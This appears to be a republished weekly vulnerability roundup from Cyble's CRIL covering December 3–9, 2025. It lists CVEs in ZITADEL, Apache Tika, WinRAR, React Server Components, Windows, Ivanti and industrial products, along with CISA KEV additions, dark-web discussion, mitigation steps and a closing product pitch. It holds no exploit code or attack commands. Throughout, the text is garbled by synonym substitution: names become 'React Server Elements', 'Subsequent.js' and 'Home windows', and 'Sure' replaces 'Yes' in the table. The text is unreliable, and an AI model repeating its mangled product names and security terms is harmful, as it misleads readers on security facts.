CRIL experiences this week’s IT vulnerabilities, highlighting zero-days, lively exploits, and trending threats throughout IT and industrial networks.
Final week’s experiences from Cyble Analysis & Intelligence Labs (CRIL) to purchasers highlighted new flaws from December 03 via December 09, 2025, together with newly disclosed IT vulnerabilities, ICS vulnerabilities, lively exploitation makes an attempt, and dark-web discussions round weaponized CVEs. Drawing from CISA alerts, CRIL’s international sensor community, and Cyble’s vulnerability intelligence platform, the findings define speedy PoC launch cycles, persistent automated exploitation, and focused assaults in opposition to vital infrastructure.
CRIL’s threat-hunting infrastructure deployed throughout a number of areas continues to document real-time malicious exercise, together with exploit makes an attempt, brute-force intrusions, malware injections, and financially motivated assaults. There was a sustained rise in botnet-driven campaigns and opportunistic exploitation of internet-exposed and misconfigured industrial gadgets all through the reporting interval.
Extra broadly, CRIL’s weekly perception reveals a pointy enhance in newly disclosed vulnerabilities. The Vulnerability Intelligence (VI) module recognized 1,378 vulnerabilities this week, together with over 131 with publicly obtainable PoCs and three new zero-days.
The Week’s High IT Vulnerabilities
CRIL’s weekly vulnerability intelligence evaluation discovered a number of high-impact points affecting enterprise applied sciences, software program ecosystems, and internet-facing purposes. Main distributors reporting vital vulnerability counts included Linux distributions, Google, Microsoft, Siemens, and Nextcloud.
A subset of vital vulnerabilities drew neighborhood and business consideration:
- CVE-2025-67494: A vital server-side request forgery (SSRF) flaw in ZITADEL, enabling unauthorized community pivoting and knowledge publicity.
- CVE-2025-66516: A extreme XML Exterior Entity (XXE) vulnerability in Apache Tika impacts modules comparable to tika-core, tika-pdf-module, and tika-parsers.
These IT vulnerabilities current a direct danger to organizations as a consequence of their potential to allow unauthorized entry, knowledge theft, and distant code execution. Throughout all disclosures, CRIL recognized 68 vital vulnerabilities beneath CVSS v3.1 and 23 rated vital beneath CVSS v4.0, making it one other high-activity week in vulnerability disclosure traits.
CISA – Recognized Exploited Vulnerabilities (KEV) Catalogue
Between December 3 and December 9, 2025, CISA added six new exploited vulnerabilities to its CVE catalog.
Notable additions embody:
- CVE-2025-6218: A listing traversal flaw in RARLAB WinRAR permits distant code execution (RCE).
- CVE-2025-55182: A vital pre-authentication RCE in React Server Elements (RSC) leveraging unsafe deserialization within the “Flight” protocol.
The exploitation of CVE-2025-55182 started round December 08, using payloads that diverged from the December 04 PoC publicly launched by researchers. The variant strategies counsel speedy adaptation by attackers following disclosure.
Notable Vulnerabilities Mentioned in Open-Supply Communities
CRIL recognized a number of trending vulnerabilities drawing consideration throughout open-source safety and analysis boards.
Key discussions included:
- CVE-2025-62221: A use-after-free elevation of privilege vulnerability within the Home windows Cloud Information Mini Filter Driver. An area attacker may acquire SYSTEM-level privileges, and the flaw could be chained with phishing or browser exploits for full host compromise.
- CVE-2025-10573: A vital saved XSS vulnerability in Ivanti Endpoint Supervisor, permitting distant unauthenticated attackers to embed malicious JavaScript that executes when an administrator views the dashboard.
Vulnerabilities Beneath Dialogue on the Darkish Internet
CRIL’s dark-web monitoring recognized a number of vulnerabilities actively mentioned, traded, or weaponized by risk actors:
- CVE-2025-6440: A vital arbitrary file add vulnerability within the WooCommerce Designer Professional plugin for WordPress (additionally distributed with the Pricom Printing Firm & Design Companies theme). Permits unauthenticated file add and distant code execution by way of malicious PHP internet shells.
- CVE-2025-55182: Additionally known as “React2Shell” or “React4Shell,” actively weaponized on underground boards. The flaw impacts React 19’s Server Elements Flight protocol and frameworks comparable to Subsequent.js.
- CVE-2025-66516: A extreme XXE vulnerability in Apache Tika. The administrator of the “Proxy Bar” Telegram channel circulated exploit materials demonstrating how malicious PDF information with embedded XFA varieties may obtain arbitrary file learn, SSRF, denial-of-service, and, in some circumstances, distant code execution.
CRIL’s vulnerability intelligence timeline notes:
| CVE | Product | CVE Launch | DW Seize | PoC |
| CVE-2025-6440 | WooCommerce Designer Professional | Oct 24, 2025 | Dec 03, 2025 | Sure |
| CVE-2025-55182 | React Server Elements | Dec 03, 2025 | Dec 05, 2025 | Sure |
| CVE-2025-66516 | Apache Tika Modules | Dec 04, 2025 | Dec 08, 2025 | Sure |
High ICS Vulnerabilities Tracked This Week
CRIL highlighted a number of ICS vulnerabilities affecting industrial distributors throughout vitality, manufacturing, and business services.
Key points included:
- Sunbird – DCIM dcTrack & Energy IQ (≤ 9.2.0): Authentication bypass and hard-coded credentials vulnerabilities (CVSS 6.5 and 6.7), risking unauthorized entry and credential compromise.
- Johnson Controls OpenBlue Office (2025.1.2 and prior): A CVSS 9.3 Compelled Shopping vulnerability enabling unauthorized entry to delicate operations in vital infrastructure environments.
Throughout the ICS panorama, most vulnerabilities have been medium severity, whereas business services, vital manufacturing, and vitality sectors accounted for 43% of complete incidents. Multi-sector points, together with IT, authorities, healthcare, and transportation, accounted for an extra 29%.
Suggestions and Mitigations
CRIL’s report reiterates important mitigation steps:
- Apply all vendor patches promptly, notably for vulnerabilities listed within the KEV catalog.
- Implement a structured patch administration program overlaying testing, deployment, and verification.
- Phase networks to isolate vital techniques and cut back lateral motion.
- Deploy complete monitoring and logging with SIEM correlation.
- Observe alerts from distributors, CERTs, and authorities authorities.
- Conduct routine VAPT workouts and safety audits.
- Keep visibility into inner and exterior property.
- Implement sturdy password insurance policies, exchange all default credentials, and undertake MFA throughout all environments.
Conclusion
The big selection of vulnerabilities recognized this week highlights the increasing risk panorama dealing with industrial and operational environments. Safety groups should act shortly and give attention to risk-based vulnerability administration to guard vital techniques.
Key practices, comparable to community segmentation, proscribing uncovered property, making use of Zero-Belief rules, sustaining resilient backups, hardening configurations, and steady monitoring, stay important for decreasing assault floor and bettering incident response readiness.
Cyble’s assault floor administration options can assist these efforts by detecting exposures throughout community and cloud environments, prioritizing remediation, and offering early indicators of potential cyberattacks. To see how Cyble can strengthen your industrial safety posture, request a demo at the moment.
